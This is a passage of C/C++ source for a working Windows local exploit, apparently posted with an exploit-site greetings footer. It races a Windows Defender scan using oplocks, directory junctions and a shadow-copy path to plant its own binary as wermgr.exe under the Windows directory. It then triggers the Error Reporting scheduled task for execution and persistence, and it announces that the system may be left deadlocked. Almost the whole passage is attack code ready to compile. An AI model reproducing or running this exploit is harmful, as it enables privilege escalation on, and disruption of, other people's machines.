GetVirtualDiskPhysicalPath(hvirtdisk, &pathsz, _mntpath); if (retval) { printf("[!] Failed to fetch mounted disk path, error: %d\n", retval); return 1; } wchar_t mntpath[MAX_PATH] = { L"\\Device\\" }; wcscat(mntpath, PathFindFileName(_mntpath)); HANDLE heicar = WriteEicar(maindirname, mntpath); if (!heicar) return 1; printf("[+] EICAR file written successfully.\n"); printf("[*] Stage 4: Triggering Windows Defender scan...\n"); SetEvent(g_poseidonevent); DWORD tid = 0; HANDLE hthread = CreateThread(NULL, 0, WDStartScan, NULL, 0, &tid); if (!hthread) { printf("[!] 
Failed to create working thread, error: %d\n", GetLastError()); return 1; } printf("[+] Windows Defender scan started.\n"); printf("[*] Stage 5: Triggering race condition...\n"); wchar_t _delpath[MAX_PATH] = { 0 }; wsprintf(_delpath, L"%s\\wermgr.exe", maindirname); UNICODE_STRING delpath = { 0 }; RtlInitUnicodeString(&delpath, _delpath); OBJECT_ATTRIBUTES delobjattr = { 0 }; InitializeObjectAttributes(&delobjattr, &delpath, OBJ_CASE_INSENSITIVE, NULL, NULL); IO_STATUS_BLOCK deliostat = { 0 }; HANDLE hc = NULL; wchar_t vsspath[MAX_PATH] = { 0 }; ShadowCopyFinderThread(vsspath); printf("[*] VSS path: %ws\n", vsspath); CloseHandle(heicar); HANDLE hvss = NULL; wchar_t vsswinpath[MAX_PATH] = { 0 }; wsprintf(vsswinpath, L"%s\\%s\\%s\\wermgr.exe:WDFOO", vsspath, &workdir[3], verdirname); UNICODE_STRING _vsswinpath = { 0 }; RtlInitUnicodeString(&_vsswinpath, vsswinpath); OBJECT_ATTRIBUTES objattr2 = { 0 }; InitializeObjectAttributes(&objattr2, &_vsswinpath, OBJ_CASE_INSENSITIVE, NULL, NULL); iostat = { 0 }; NTSTATUS stat = NtCreateFile(&hvss, GENERIC_READ | SYNCHRONIZE, &objattr2, &iostat, NULL, NULL, NULL, FILE_OPEN, NULL, NULL, NULL); REQUEST_OPLOCK_INPUT_BUFFER opin = { 0 }; opin.StructureLength = sizeof(opin); opin.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION; opin.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE; opin.Flags = REQUEST_OPLOCK_INPUT_FLAG_REQUEST; REQUEST_OPLOCK_OUTPUT_BUFFER opout = { 0 }; opout.StructureLength = sizeof(opout); opout.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION; DWORD cb = 0; OVERLAPPED ovoplock = { 0 }; ovoplock.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL); DeviceIoControl(hvss, FSCTL_REQUEST_OPLOCK, &opin, sizeof(opin), &opout, sizeof(opout), &cb, &ovoplock); WaitForSingleObject(ovoplock.hEvent, INFINITE); CloseHandle(hvss); NTSTATUS delstat = NtCreateFile(&hc, DELETE, &delobjattr, &deliostat, NULL, NULL, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_SUPERSEDE, NULL, NULL, NULL); 
MoveToTempDir(hc); if (!CreateJunction(hdir, mntpath)) return 1; if (hc) CloseHandle(hc); printf("[*] Stage 6: Monitoring for directory changes...\n"); char buff[0x1000] = { 0 }; wchar_t teststr[] = { L"Temp\\TMP" }; do { ZeroMemory(buff, sizeof(buff)); DWORD retbytes = 0; ReadDirectoryChangesW(hwin, buff, sizeof(buff), TRUE, FILE_NOTIFY_CHANGE_FILE_NAME, &retbytes, NULL, NULL); PFILE_NOTIFY_INFORMATION pfni = (PFILE_NOTIFY_INFORMATION)buff; if (pfni->FileNameLength / 2 != 24 || _wcsnicmp(&pfni->FileName[0], teststr, 8) != 0) continue; break; } while (1); printf("[*] Stage 7: Finalizing exploit...\n"); wchar_t workdir2[MAX_PATH] = { L"\\??\\" }; wcscat(workdir2, workdir); if (!CreateJunction(hdir, dirtmp)) { return 1; } wchar_t lockpath[MAX_PATH] = { 0 }; wsprintf(lockpath, L"%s\\wermgr.exe", mntpath); HANDLE hlock1 = NULL; UNICODE_STRING _lockpath = { 0 }; RtlInitUnicodeString(&_lockpath, lockpath); OBJECT_ATTRIBUTES lockpathobjattr = { 0 }; InitializeObjectAttributes(&lockpathobjattr, &_lockpath, OBJ_CASE_INSENSITIVE, NULL, NULL); iostat = { 0 }; CloseHandle(WriteEicar(maindirname, mntpath)); stat = NtCreateFile(&hlock1, GENERIC_READ, &lockpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN, NULL, NULL, NULL); if (stat) { printf("[!] Failed to open file: %ws, error: 0x%0.8X\n", lockpath, stat); return 1; } if (!LockFile(hlock1, NULL, NULL, MAXDWORD, MAXDWORD)) { printf("[!] 
Failed to lock file, error: %d\n", GetLastError()); return 1; } HANDLE heicar2 = NULL; wchar_t eicarpath[MAX_PATH] = { 0 }; wsprintf(eicarpath, L"%s\\wermgr.exe", maindirname); UNICODE_STRING _eicarpath = { 0 }; RtlInitUnicodeString(&_eicarpath, eicarpath); OBJECT_ATTRIBUTES eicarpathobjattr = { 0 }; InitializeObjectAttributes(&eicarpathobjattr, &_eicarpath, OBJ_CASE_INSENSITIVE, NULL, NULL); iostat = { 0 }; stat = NtCreateFile(&heicar2, GENERIC_READ, &eicarpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN, NULL, NULL, NULL); if (stat) { printf("[!] Failed to open file: %ws, error: 0x%0.8X\n", eicarpath, stat); return 1; } wchar_t newfpath[MAX_PATH] = { 0 }; wcscpy(newfpath, maindirname); wcscat(newfpath, L"\\"); do { ZeroMemory(buff, sizeof(buff)); DWORD retbytes = 0; ReadDirectoryChangesW(hdirtmp, buff, sizeof(buff), TRUE, FILE_NOTIFY_CHANGE_SIZE, &retbytes, NULL, NULL); PFILE_NOTIFY_INFORMATION pfni = (PFILE_NOTIFY_INFORMATION)buff; wcscat(newfpath, &pfni->FileName[0]); break; } while (1); if (!LockFile(heicar2, NULL, NULL, MAXDWORD, MAXDWORD)) { printf("[!] 
Failed to lock EICAR file, error: %d\n", GetLastError()); return 1; } CloseHandle(hwin); REPARSE_GUID_DATA_BUFFER rp_buffer = { 0 }; rp_buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT; DWORD cb2 = 0; OVERLAPPED ov = { 0 }; HANDLE hevent = CreateEvent(NULL, FALSE, FALSE, NULL); ov.hEvent = hevent; DeviceIoControl(hdir, FSCTL_DELETE_REPARSE_POINT, &rp_buffer, REPARSE_GUID_DATA_BUFFER_HEADER_SIZE, nullptr, 0, &cb2, &ov); CloseHandle(ov.hEvent); printf("[*] Stage 8: Writing payload...\n"); HANDLE htempfile = NULL; UNICODE_STRING _newfpath = { 0 }; RtlInitUnicodeString(&_newfpath, newfpath); OBJECT_ATTRIBUTES newfpathobjattr = { 0 }; InitializeObjectAttributes(&newfpathobjattr, &_newfpath, OBJ_CASE_INSENSITIVE, NULL, NULL); iostat = { 0 }; stat = NtCreateFile(&htempfile, GENERIC_READ | GENERIC_WRITE | DELETE, &newfpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OVERWRITE_IF, NULL, NULL, NULL); if (stat) { printf("[!] Failed to open file: %ws, error: 0x%0.8X\n", newfpath, stat); return 1; } HMODULE module = GetModuleHandle(NULL); wchar_t mx[MAX_PATH] = { 0 }; GetModuleFileName(module, mx, MAX_PATH); HANDLE hself = CreateFile(mx, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (!hself || hself == INVALID_HANDLE_VALUE) { printf("[!] Failed to open current executable, error: %d\n", GetLastError()); return 1; } DWORD readbytes = 0; LARGE_INTEGER li = { 0 }; GetFileSizeEx(hself, &li); void* exebuff = malloc(li.QuadPart); if (!ReadFile(hself, exebuff, li.QuadPart, &readbytes, NULL)) { printf("[!] Failed to read current executable binary, error: %d\n", GetLastError()); return 1; } CloseHandle(hself); readbytes = 0; OVERLAPPED ovp = { 0 }; ovp.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL); if (WriteFile(htempfile, exebuff, li.QuadPart, &readbytes, &ovp) == ERROR_IO_PENDING) { printf("[!] 
Failed to write payload file, error: %d\n", GetLastError()); return 1; } WaitForSingleObject(ovp.hEvent, INFINITE); CloseHandle(ovp.hEvent); free(exebuff); printf("[*] Stage 9: Finalizing and detaching...\n"); CloseHandle(heicar2); MoveToTempDir(htempfile); MoveToTempDir(hdirtmp); MoveToTempDir(hdir); HANDLE hparent = NULL; UNICODE_STRING _workdir = { 0 }; RtlInitUnicodeString(&_workdir, workdir2); OBJECT_ATTRIBUTES workdirobjattr = { 0 }; InitializeObjectAttributes(&workdirobjattr, &_workdir, OBJ_CASE_INSENSITIVE, NULL, NULL); iostat = { 0 }; stat = NtCreateFile(&hparent, FILE_WRITE_ATTRIBUTES, &workdirobjattr, &iostat, NULL, NULL, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN, FILE_DIRECTORY_FILE, NULL, NULL); if (stat) { printf("[!] Failed to open file: %ws, error: 0x%0.8X\n", workdir2, stat); return 1; } wchar_t __tmp[MAX_PATH] = { 0 }; GetWindowsDirectory(__tmp, MAX_PATH); wchar_t dest[MAX_PATH] = { L"\\??\\" }; wcscat(dest, __tmp); if (!CreateJunction(hparent, dest)) { return 1; } CloseHandle(hparent); CloseHandle(hdirtmp); CloseHandle(hdir); DetachVirtualDisk(hvirtdisk, DETACH_VIRTUAL_DISK_FLAG_NONE, NULL); CloseHandle(hvirtdisk); WaitForSingleObject(hthread, INFINITE); CloseHandle(hthread); CloseHandle(htempfile); g_poseidonexit = true; Sleep(500); printf("[*] Stage 11: Triggering persistence...\n"); HRESULT hr = S_OK; ITaskService* pTaskSvc = NULL; hr = CoInitialize(NULL); if (SUCCEEDED(hr)) { hr = CoCreateInstance(CLSID_TaskScheduler, NULL, CLSCTX_INPROC_SERVER, IID_ITaskService, (void**)&pTaskSvc); if (FAILED(hr)) { printf("[!] Failed to initialize task scheduler COM server.\n"); CoUninitialize(); return 1; } } else { return 1; } hr = pTaskSvc->Connect(_variant_t(), _variant_t(), _variant_t(), _variant_t()); if (hr) { printf("[!] 
Failed to connect to task scheduler service, error: 0x%0.8X\n", hr); return 1; } ITaskFolder* taskfolder = NULL; hr = pTaskSvc->GetFolder((BSTR)L"\\Microsoft\\Windows\\Windows Error Reporting", &taskfolder); if (hr) { printf("[!] Failed to get task scheduler folder, error: 0x%0.8X\n", hr); return 1; } IRegisteredTask* taskex = NULL; hr = taskfolder->GetTask((BSTR)L"QueueReporting", &taskex); if (hr) { printf("[!] Failed to obtain task object, error: 0x%0.8X\n", hr); return 1; } IRunningTask* runningtask = NULL; hr = taskex->Run(_variant_t(), &runningtask); if (hr) { printf("[!] Failed to run scheduled task, error: 0x%0.8X\n", hr); return 1; } if (!ConnectNamedPipe(hpipe, NULL)) { printf("[!] ConnectNamedPipe failed, error: %d\n", GetLastError()); return 1; } printf("\n============================================================\n"); printf(" [!!] EXPLOIT SUCCESSFUL\n"); printf(" System should now be in a frozen/deadlocked state.\n"); printf(" Some drivers may fail to load on next boot.\n"); printf("============================================================\n\n"); runningtask->Release(); taskex->Release(); taskfolder->Release(); pTaskSvc->Release(); CoUninitialize(); return 0; } Greetings to :============================================================================== jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)| ============================================================================================